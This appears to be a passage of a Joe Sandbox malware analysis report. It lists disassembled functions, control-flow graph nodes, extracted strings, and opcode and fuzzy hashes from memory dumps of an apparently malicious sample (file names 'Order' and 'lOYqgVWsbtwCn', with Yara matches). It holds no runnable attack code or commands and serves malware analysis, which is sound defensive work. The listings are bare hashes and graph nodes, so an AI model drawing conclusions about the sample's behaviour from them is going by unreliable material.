                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: c075bf17525724de2f2cf6854a49e987d4cc26c8aac243e0bc1016a04e5fdda9
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: 2E81B138E062498EEF2BCF6CEA507BEBBB1AF45310F1C4559D851A72D1C73499408B71
                                                                Function 01A720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: 9cfe01ffb38fbabb77c494c8185930d3f2f26b39d85c2b0cd300f5b51f90c7a9
                                                                • Instruction ID: 7d8d14bd58121c674941eb05248833b5c00fb2b0984de0c38ba8be1404775d3d
                                                                • Opcode Fuzzy Hash: 9cfe01ffb38fbabb77c494c8185930d3f2f26b39d85c2b0cd300f5b51f90c7a9
                                                                • Instruction Fuzzy Hash: 0121627AA00259ABDB11DF79ED40AFEBBF8FF54650F040126EA45E3241E730DA018BA1
                                                                Function 019EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 01A3031E
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A302BD
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A302E7
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: 0fa60ad2411243e3af6d2cf1a099ea2e4836cc8c967c520d0ba5f95bb1adbde9
                                                                • Instruction ID: bfd79673e99b809377f634e424c53fe81ec60ba13ac740b3f286ae6bb1bd8d07
                                                                • Opcode Fuzzy Hash: 0fa60ad2411243e3af6d2cf1a099ea2e4836cc8c967c520d0ba5f95bb1adbde9
                                                                • Instruction Fuzzy Hash: 0FE1C0306047419FE726CF28C988B2ABBE4BF88714F140A5EF5A9CB2E1D775D945CB42
                                                                Function 019FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A37B7F
                                                                • RTL: Resource at %p, xrefs: 01A37B8E
                                                                • RTL: Re-Waiting, xrefs: 01A37BAC
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: 1aa4221b4b3c036f421474cd7d71083fab32978872408f04d2f2e87e912975f4
                                                                • Instruction ID: efef770dc234e9771f9c56b044d9ad82039aa1fa306a45e1f439633180195512
                                                                • Opcode Fuzzy Hash: 1aa4221b4b3c036f421474cd7d71083fab32978872408f04d2f2e87e912975f4
                                                                • Instruction Fuzzy Hash: 0541EF35704702AFD725DE29C940F6AB7E5EF88721F000A1DFA5B9B680DB31E8058B91
                                                                Function 019FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A3728C
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 01A372A3
                                                                • RTL: Re-Waiting, xrefs: 01A372C1
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A37294
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 01328441b18321590dc9a45f4591721960d635f777c1cd90b799838d9daa670b
                                                                • Instruction ID: 321849633cfeaaa6104f575f7c995d35dc6b52135d84f052f99b0112f99bea31
                                                                • Opcode Fuzzy Hash: 01328441b18321590dc9a45f4591721960d635f777c1cd90b799838d9daa670b
                                                                • Instruction Fuzzy Hash: 3C410271700202AFD721CFA9CD41F6AB7A5FB94B10F10061DFA5AAB280DB30F8568BD1
                                                                Function 01A72300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: 59c53199998cb86e126a3701b2ebc86fb1f2ffda866053d9484c5ace4c142ba3
                                                                • Instruction ID: d6bb77e1c5bb1cee5d18388460ac23e4fd2360a9d484350ca1b5140f32194c62
                                                                • Opcode Fuzzy Hash: 59c53199998cb86e126a3701b2ebc86fb1f2ffda866053d9484c5ace4c142ba3
                                                                • Instruction Fuzzy Hash: 4D319372A002199FDB20DF2DDD40BEEB7F8FF54610F44455AE949E3240EB30AB448BA0
                                                                Function 01A07D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: 415167690a4b68f5e0e6cb0a09056a60b43caef496bb5da04675d4b2ab1bb369
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: 5491B2B1E002169BEF26DFADE8806BEBBB5AF44320F54451EE995E72C0D734AD40CB51
                                                                Function 019C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 1b52e26e3dba0dde6853e3bb802a36e964c6b3e8b1759b1f582232af408b0354
                                                                • Instruction ID: 79ecee8af4586b4101e0e72824e0f786931a1bfa7916fc84086cdaad4b079968
                                                                • Opcode Fuzzy Hash: 1b52e26e3dba0dde6853e3bb802a36e964c6b3e8b1759b1f582232af408b0354
                                                                • Instruction Fuzzy Hash: 07812B76D002699BDB31CB58CC45BEABBB8AB48714F0441EAEA0DB7240D7705E85CFA1

                                                                Execution Graph

                                                                Execution Coverage:3.2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 17669 a5c83b 17670 a5c858 17669->17670 17671 a5c867 closesocket 17670->17671

                                                                Executed Functions

                                                                Function 039C1332 Relevance: .1, Instructions: 109COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 313 39c1332-39c133c 314 39c139e-39c13b4 313->314 315 39c133e call 39c0921 313->315 317 39c13bc-39c140b 314->317 318 39c13b6 314->318 319 39c1343-39c1344 315->319 320 39c140d 317->320 321 39c1413-39c1460 317->321 318->317 320->321 322 39c1468-39c14c4 321->322 323 39c1462 321->323 323->322
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0b0a1a7ab027f540a41a2cebfd3ccb166355b4acf1cc2c55d69095c2f33a959
                                                                • Instruction ID: a7f4700b4d374f4c246e51e7543f4d50d059fe6d4fa9a50fb13c36b6a5e9cae4
                                                                • Opcode Fuzzy Hash: c0b0a1a7ab027f540a41a2cebfd3ccb166355b4acf1cc2c55d69095c2f33a959
                                                                • Instruction Fuzzy Hash: FB31BE116583F14ED31E836D08BD679AFC28E9720174EC2EEDADA5F2E3C4888418D3A5
                                                                Function 039C0901 Relevance: 29.2, Strings: 23, Instructions: 486COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 39c0901-39c0907 1 39c096f-39c0cd4 0->1 2 39c0909-39c091b 0->2 3 39c0ce5-39c0cf1 1->3 4 39c0cd6-39c0cdf 1->4 5 39c0cfe-39c0d16 3->5 6 39c0cf3-39c0cfc 3->6 4->3 7 39c0d27-39c0d30 5->7 6->4 8 39c0d40 7->8 9 39c0d32-39c0d3e 7->9 11 39c0d4a-39c0d63 8->11 9->7 11->11 12 39c0d65-39c0d6e 11->12 13 39c0e9c-39c0ea3 12->13 14 39c0d74-39c0d7b 12->14 17 39c0ec4-39c0ecd 13->17 18 39c0ea5-39c0ec2 13->18 15 39c0dbc-39c0dd5 14->15 16 39c0d7d-39c0dba 14->16 19 39c0de6-39c0def 15->19 16->14 20 39c101d-39c1024 17->20 21 39c0ed3-39c0edd 17->21 18->13 24 39c0e06-39c0e18 19->24 25 39c0df1-39c0e04 19->25 22 39c105b-39c1065 20->22 23 39c1026-39c1059 20->23 26 39c0eee-39c0ef7 21->26 27 39c1076-39c1082 22->27 23->20 29 39c0e1a-39c0e21 24->29 30 39c0e23-39c0e2d 24->30 25->19 31 39c0f08 call 39db8e1 26->31 32 39c0ef9-39c0f06 26->32 36 39c1084-39c1090 27->36 37 39c1092-39c109c 27->37 29->13 34 39c0e3e-39c0e4a 30->34 38 39c0f0d 31->38 33 39c0edf-39c0ee8 32->33 33->26 39 39c0e4c-39c0e58 34->39 40 39c0e5a-39c0e6d 34->40 36->27 42 39c10ad-39c10b9 37->42 43 39c0f10-39c0f1c 38->43 39->34 45 39c0e7e-39c0e8a 40->45 46 39c10cb-39c10d5 42->46 47 39c10bb-39c10c1 42->47 48 39c0f1e-39c0f3f 43->48 49 39c0f41-39c0f48 43->49 50 39c0e8c-39c0e95 45->50 51 39c0e97 45->51 54 39c10e6-39c10f2 46->54 52 39c10c9 47->52 53 39c10c3-39c10c6 47->53 48->43 55 39c0f7a-39c0f7e 49->55 56 39c0f4a-39c0f78 49->56 50->45 51->12 52->42 53->52 59 39c1109-39c1113 54->59 60 39c10f4-39c1107 54->60 63 39c0fa7-39c0fb1 55->63 64 39c0f80-39c0fa5 55->64 56->49 62 39c1124-39c1130 59->62 60->54 65 39c1148-39c1152 62->65 66 39c1132-39c113b 62->66 67 39c0fc2-39c0fce 63->67 64->55 70 39c1163-39c116f 65->70 68 39c113d-39c1143 66->68 69 39c1146 66->69 71 39c0fde-39c0fe8 67->71 72 39c0fd0-39c0fdc 67->72 68->69 69->62 74 39c1180-39c118a 70->74 75 39c1171-39c117e 70->75 77 39c0feb-39c0fef 71->77 72->67 79 39c119b-39c11a4 74->79 75->70 77->20 80 39c0ff1-39c101b 77->80 81 39c11bb-39c11c2 79->81 82 39c11a6-39c11b9 79->82 80->77 84 39c11ec-39c11f5 81->84 85 39c11c4-39c11d6 81->85 82->79 88 39c11f7-39c120f 84->88 89 39c1211-39c122a 84->89 86 39c11dd-39c11df 85->86 87 39c11d8-39c11dc 85->87 90 39c11ea 86->90 91 39c11e1-39c11e7 86->91 87->86 88->84 89->89 92 39c122c-39c1236 89->92 90->81 91->90 93 39c1247-39c124e 92->93 94 39c1250-39c1261 93->94 95 39c1263-39c126d 93->95 94->93 97 39c127e-39c1288 95->97 98 39c128a-39c12e0 97->98 99 39c12e2-39c12ec 97->99 98->97 100 39c12ee-39c130d 99->100 101 39c1320-39c1327 99->101 103 39c131e 100->103 104 39c130f-39c1318 100->104 103->99 104->103
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$_$`+$f$i>$m$t$t>$yv$zv$}$}
                                                                • API String ID: 0-3942510243
                                                                • Opcode ID: 6d6594cea4630f6e81d6a94a4e7ad06afddbc915cb6c5251649a00a08d966b90
                                                                • Instruction ID: 0130987a0d06e498599dbed2f60724893da0eaa9277f6830b401283afa4f61e8
                                                                • Opcode Fuzzy Hash: 6d6594cea4630f6e81d6a94a4e7ad06afddbc915cb6c5251649a00a08d966b90
                                                                • Instruction Fuzzy Hash: D3429BB0E152A8CFEB68CF45C8947DDBBB2BB45308F1085D9C14D6B281CB795A88CF56
                                                                Function 039CE5F1 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$O$S$\$s
                                                                • API String ID: 0-3854637164
                                                                • Opcode ID: 34835148c52b18033714975159add09a59853d8c6d7b47ae1c7b6fab0ac377f4
                                                                • Instruction ID: 2a8c59f2f57f56cd5f28a825c5d7553731dc797a6e95f9424e1f2d4aa7414195
                                                                • Opcode Fuzzy Hash: 34835148c52b18033714975159add09a59853d8c6d7b47ae1c7b6fab0ac377f4
                                                                • Instruction Fuzzy Hash: 7151B1B2D10218ABDB10EF94DC89AFEB37CEF84311F044299E9096B140EB745B54CBA2
                                                                Function 00A5C83B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 152 a5c83b-a5c875 call a342db call a5d43b closesocket
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_9e0000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID:
                                                                • API String ID: 2781271927-0
                                                                • Opcode ID: 55308f3f9ae74ef7eaa8f49620fff32250108903cd2da531039e6e7d2221ac36
                                                                • Instruction ID: cb2db26bfecff21ab254fb47ed14e2fb4a7d5e681f284a11394e75af5cd340bf
                                                                • Opcode Fuzzy Hash: 55308f3f9ae74ef7eaa8f49620fff32250108903cd2da531039e6e7d2221ac36
                                                                • Instruction Fuzzy Hash: D8E08C322006147BC620EBA9DC41DEB77ACEFC6311F804419FE08A7201CB71B9168BF0
                                                                Function 039DCCB1 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 157 39dccb1-39dcd1b call 39b7bc1 160 39dcd1d-39dcd26 call 39c6d11 157->160 161 39dcd49-39dcd50 157->161 163 39dcd2b-39dcd48 call 39b7a41 160->163
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 9=
                                                                • API String ID: 0-389403476
                                                                • Opcode ID: 1ba39770b36bb2efd0079e1446335265e113c75a81ecf2ac7fbceb1315de4861
                                                                • Instruction ID: d95341c94e525a7654b8fc14c3970810b55db6740c54e02e4e7c9c67b36bd06d
                                                                • Opcode Fuzzy Hash: 1ba39770b36bb2efd0079e1446335265e113c75a81ecf2ac7fbceb1315de4861
                                                                • Instruction Fuzzy Hash: E811D0B6D0121CAF8B00DFE9DD419EEBBF9EF88210F54456AE919E7200E7715A058FA1
                                                                Function 039BA093 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 182 39ba093-39ba0de 183 39ba0e1-39ba0f3 call 39ce551 182->183 186 39ba111-39ba14a call 39def81 183->186 187 39ba0f5-39ba0ff 183->187 190 39ba14f-39ba154 186->190 187->183 188 39ba101-39ba110 187->188 190->188 191 39ba156-39ba172 call 39de881 190->191 191->188 194 39ba174-39ba197 call 39df061 191->194 194->188 197 39ba19d-39ba1c0 call 39df061 194->197 197->188 200 39ba1c6-39ba1e4 197->200
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d3bb3fcb993e78ad3349eeaed30b0b2ffddea547d84ec4fdd42e6b3644fe4f0c
                                                                • Instruction ID: 2cdb5223e2df3fe740d2c8af927ba27fbb7e7500b6685c0bf6278c9548f780ce
                                                                • Opcode Fuzzy Hash: d3bb3fcb993e78ad3349eeaed30b0b2ffddea547d84ec4fdd42e6b3644fe4f0c
                                                                • Instruction Fuzzy Hash: 06412EB1D11219AFDB14CF99CD81AEEBBBCEF49710F10415AFA14EB240E7B19640CBA4
                                                                Function 039DEF81 Relevance: .1, Instructions: 85COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54337d446fa869ba92829349f07c51fc25ec04c673d4127cdfb882d8e4ea316c
                                                                • Instruction ID: eb372120e869abd33066b8026f6750e27adf250ce4530068d2661507ef4e665c
                                                                • Opcode Fuzzy Hash: 54337d446fa869ba92829349f07c51fc25ec04c673d4127cdfb882d8e4ea316c
                                                                • Instruction Fuzzy Hash: A1311AB5A00649ABDB14DF98D841EEFB7B8EF88300F108219F919A7340D770AD158BA1
                                                                Function 039DF8D1 Relevance: .1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba98c41e336530404247d220aab491f9420333af4528bc8c5997651ad2a80bef
                                                                • Instruction ID: d959675c4abc4f5a91b780f687393d67993ccf37ace40f07afe5f112c16cf7d3
                                                                • Opcode Fuzzy Hash: ba98c41e336530404247d220aab491f9420333af4528bc8c5997651ad2a80bef
                                                                • Instruction Fuzzy Hash: 652119B5A00609ABDB14DF98D845EEF77B8EF88700F104249FD19AB240D770A9158BA5
                                                                Function 039CE431 Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 243c135a4095cb6747dc3667deed954e439b7db5e3ad43846ca40462c780e62b
                                                                • Instruction ID: 59b4e76293a3f034627f109c649c38b7cb403d291e1f723e4f479bf2fd3c1ac5
                                                                • Opcode Fuzzy Hash: 243c135a4095cb6747dc3667deed954e439b7db5e3ad43846ca40462c780e62b
                                                                • Instruction Fuzzy Hash: F411C2B67803087BF720EA559C43FAB375C9BC4B51F244015FF09AE2C0E6B4B81146B9
                                                                Function 039DED91 Relevance: .1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2ce462a3ec75bf52468d33be574df14a618b7a36356d41f72aac975e0b870155
                                                                • Instruction ID: 4be04faf7b5c6ac316bcab219603fe0acb87d2f9b504ceb59d8ece382917638e
                                                                • Opcode Fuzzy Hash: 2ce462a3ec75bf52468d33be574df14a618b7a36356d41f72aac975e0b870155
                                                                • Instruction Fuzzy Hash: 0B117C75944754BBD710EAA88C46FEB73ACEFC9700F104149F9195A280D7B0691587A1
                                                                Function 039DB971 Relevance: .1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a8b047226e4cf2ee44a1ab719abde226497fa320677b12104342e7a5d5407d83
                                                                • Instruction ID: 9e66c472bd6b599d7d5d955468cd3853a38cebc7fe47f019fe91ec536211e3c3
                                                                • Opcode Fuzzy Hash: a8b047226e4cf2ee44a1ab719abde226497fa320677b12104342e7a5d5407d83
                                                                • Instruction Fuzzy Hash: 5E2124B6D0121DAFCB00DFA9D9418EFBBF9EF88200F04416AE909E7200E7705A008BA1
                                                                Function 039DEC11 Relevance: .1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1662f6d820b573e8cf825ced8c2dfc1149c67ff21fd4f63b6d7b1b91a47811d0
                                                                • Instruction ID: d28675311d7430ff0326fc6a04d27b9d7ac04bccee8da921dd6088ae82b16a41
                                                                • Opcode Fuzzy Hash: 1662f6d820b573e8cf825ced8c2dfc1149c67ff21fd4f63b6d7b1b91a47811d0
                                                                • Instruction Fuzzy Hash: 29114C75940349ABD710EAA8CC46FEF73ACEFC9710F104649F9196B284D7B169058BA1
                                                                Function 039DFC31 Relevance: .0, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                • Instruction ID: 14b987ca7a371e80150e4668238a2be16647d02bd1880197bd2fafd7b7bc6011
                                                                • Opcode Fuzzy Hash: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                • Instruction Fuzzy Hash: 49018CB6204248BBDB44DE99DD91EEB77ADAFCC714F508608BA09A7240D670EC518BA4
                                                                Function 039DB8E1 Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ea9f83b476703569a497567ae94f9b55c767c8ae5c7d8084d9c0c4b31f86b8b3
                                                                • Instruction ID: 24be21fb244c1501560bb9178768bfaecbbf461875fc22ac8f2f68ee702eeb72
                                                                • Opcode Fuzzy Hash: ea9f83b476703569a497567ae94f9b55c767c8ae5c7d8084d9c0c4b31f86b8b3
                                                                • Instruction Fuzzy Hash: 0B01D3B6D11219AFCB40DFE8D9419EFBBF8AB48200F54426EE819F7240F7715A048BA1
                                                                Function 039BA1E5 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c88a105afdb57d754c3ccbf7dc919d1d2fb40ef74bf4e6a6c2ce3675636679be
                                                                • Instruction ID: 9679c7540c132bd81a4cc61a766a2e808c58a0f2b9102f1d5996bed7bb0ded64
                                                                • Opcode Fuzzy Hash: c88a105afdb57d754c3ccbf7dc919d1d2fb40ef74bf4e6a6c2ce3675636679be
                                                                • Instruction Fuzzy Hash: 34F0E073A102065BD7108E6DEC41BD6F7ACFFC4334F244222F858DB641E632D8518790
                                                                Function 039DEE91 Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0beca4c5030d87ac569e1118754566c271f2f3493c482814f00c1c50a5af95f8
                                                                • Instruction ID: 25c4c01b1de42990bf56cafd00aabddcf4c101f3833eedd9757868748c9e86e1
                                                                • Opcode Fuzzy Hash: 0beca4c5030d87ac569e1118754566c271f2f3493c482814f00c1c50a5af95f8
                                                                • Instruction Fuzzy Hash: 38F0F8B6204209BBDB10DF99DC85E9B77ADEFC8710F108509F91897240D670BD118BB0
